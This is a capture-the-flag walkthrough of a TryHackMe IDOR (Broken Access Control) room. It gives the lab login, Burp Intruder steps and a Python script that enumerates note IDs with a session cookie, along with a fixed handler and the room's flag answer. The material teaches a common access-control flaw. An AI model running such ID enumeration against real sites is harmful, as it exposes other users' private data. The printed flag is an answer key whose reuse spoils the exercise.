TryHackMe: OWASP Top 10 || Severity 5 || Broken Access Control

goay xuan hui
Apr 6, 2021

--

This challenge exploits an Insecure Direct Object Reference (IDOR): the application exposes a direct reference to an internal object (here, a note ID in the URL) and serves that object without checking that the logged-in user is actually allowed to see it. Changing the reference is enough to read other users' data, which is why OWASP files IDOR under Broken Access Control rather than input validation.

For example, after browsing to http://10.10.147.196 and logging in with the username noot and the password test123, we land on http://10.10.147.196/note.php?note=1. The note ID is passed straight in the query string, which makes it an obvious candidate for tampering.
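To make the flaw concrete, here is a minimal model of the lookup behind note.php?note=<id>, first as the room's page behaves and then with the missing ownership check. This is an added illustration, not the room's actual note.php source; the in-memory note store, the user names and the note IDs are constructed, with the id 0 / flag{fivefourthree} pairing taken from the walkthrough.

```python
from urllib.parse import parse_qs

# Constructed stand-in for the server-side note table (assumption: the
# real app keys notes by a small integer and records an owner).
NOTES = {
    0: {"owner": "admin", "body": "flag{fivefourthree}"},
    1: {"owner": "noot", "body": "noot's private note"},
    2: {"owner": "bob", "body": "bob's private note"},
}


def parse_note_id(query_string):
    """Pull ?note=<id> out of the query string; None unless it is one plain integer."""
    values = parse_qs(query_string).get("note", [])
    if len(values) != 1 or not values[0].isdigit():
        return None
    return int(values[0])


def note_vulnerable(query_string, session_user):
    """IDOR: whatever id the client names is served, the session is never consulted."""
    note_id = parse_note_id(query_string)
    if note_id is None:
        return 400, "bad note id"
    note = NOTES.get(note_id)
    if note is None:
        return 404, "Note not found"
    return 200, note["body"]


def note_fixed(query_string, session_user):
    """Same lookup, but ownership is checked against the server-side session user."""
    note_id = parse_note_id(query_string)
    if note_id is None:
        return 400, "bad note id"
    note = NOTES.get(note_id)
    # One reply for both 'missing' and 'belongs to someone else', so the
    # endpoint does not become an oracle for which ids exist.
    if note is None or note["owner"] != session_user:
        return 404, "Note not found"
    return 200, note["body"]


if __name__ == "__main__":
    # noot asks for note 0 on each version of the handler
    print(note_vulnerable("note=0", "noot"))  # (200, 'flag{fivefourthree}')
    print(note_fixed("note=0", "noot"))       # (404, 'Note not found')
```

The fix is the single ownership comparison; everything the client controls (the id) is still used, but only after the server has decided, from its own session state, whose notes the request may touch.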

We can then tamper with that parameter using Burp Suite to see whether we can read other users' notes:

  • Turn on your browser's proxy and Burp's interceptor, catch the request for note.php?note=1, and send it to Intruder with the value of the note parameter marked as the payload position.
  • Load the payload list from /usr/share/wordlists/SecLists/Fuzzing/alphanum-case.txt; single letters and digits are enough here because the IDs are small sequential integers.
  • Start the attack and sort the results by response length. The request with payload 0 (http://10.10.147.196/note.php?note=0) stands out, and its response contains flag{fivefourthree}.
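The same enumeration can be scripted, which is useful when the ID space is larger than a single-character wordlist. The script below is an added example, not part of the original walkthrough: it replays the logged-in session cookie against note.php for a range of IDs and flags responses that differ both from our own note and from the "missing note" baseline, then greps them for flag-shaped strings. The cookie name and value, the candidate ID range, the baseline ID and the offline sample pages are constructed assumptions.

```python
import re
import urllib.request
from urllib.parse import urlencode

BASE_URL = "http://10.10.147.196/note.php"
FLAG_RE = re.compile(r"flag\{[^}]+\}")


def http_fetch(cookie):
    """Build a fetcher that requests note.php?note=<id> with our session cookie
    (assumption: the app tracks the login with a cookie such as PHPSESSID)."""
    def fetch(note_id):
        req = urllib.request.Request(
            f"{BASE_URL}?{urlencode({'note': note_id})}",
            headers={"Cookie": cookie},
        )
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    return fetch


def enumerate_notes(fetch, own_id, candidate_ids, baseline_id=999999):
    """Fetch every candidate id and report the ones that return something new.

    Two baselines are taken first: our own note and an id assumed to be unused.
    A hit is any 200 response whose body matches neither, i.e. a note that is
    neither ours nor 'not found'. Hits map to the flag strings found in the
    body, or to a short description if no flag pattern is present.
    """
    _, own_body = fetch(own_id)
    _, missing_body = fetch(baseline_id)
    hits = {}
    for note_id in candidate_ids:
        if note_id == own_id:
            continue
        status, body = fetch(note_id)
        if status != 200 or body in (own_body, missing_body):
            continue
        found = FLAG_RE.findall(body)
        hits[note_id] = found or [f"{len(body)} bytes, differs from own note"]
    return hits


def fake_fetch(note_id):
    """Constructed stand-in for the lab so the script can run offline."""
    pages = {
        0: "<p>flag{fivefourthree}</p>",
        1: "<p>noot's note</p>",
        2: "<p>another user's note</p>",
    }
    return 200, pages.get(note_id, "<p>Note not found</p>")


if __name__ == "__main__":
    # Against the room: enumerate_notes(http_fetch("PHPSESSID=<your session>"), 1, range(0, 100))
    print(enumerate_notes(fake_fetch, 1, range(0, 10)))
```

Comparing against both baselines matters: an application that returns a 200 "Note not found" page for unknown IDs would otherwise look like a hit on every request, and one that renders our own note for bad IDs would hide real hits among copies of it.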

#1 Look at other users' notes. What is the flag?

flag{fivefourthree}

--
